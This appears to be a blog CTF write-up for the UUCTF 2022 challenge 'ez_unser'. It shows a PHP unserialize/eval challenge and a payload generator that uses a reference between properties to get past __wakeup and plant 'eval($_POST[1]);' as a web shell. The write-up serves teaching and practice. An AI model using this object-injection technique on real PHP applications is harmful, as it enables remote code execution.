CHHHCHHOH 's BLOG

[UUCTF 2022 新生赛]ez_unser

<?php
show_source(__FILE__);

###very___so___easy!!!!
class test{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a=1;
        $this->b=2;
        $this->c=3;
    }
    public function __wakeup(){
        $this->a='';
    }
    public function __destruct(){
        $this->b=$this->c;
        eval($this->a);
    }
}
$a=$_GET['a'];
if(!preg_match('/test":3/i',$a)){
    die("你输入的不正确!!!搞什么!!");
}
$bbb=unserialize($_GET['a']);

无法通过改变成员数来绕过_wakeup,但可以让$b和$a用同一块内存空间,c给b赋值,相当于就是给a赋值。

<?php 
class test{
    public $a;
    public $b;
    public $c;
}
$test=new test();
$test->b=&$test->a;
$test->c='eval($_POST[1]);';
echo serialize($test);
?> 

添加新评论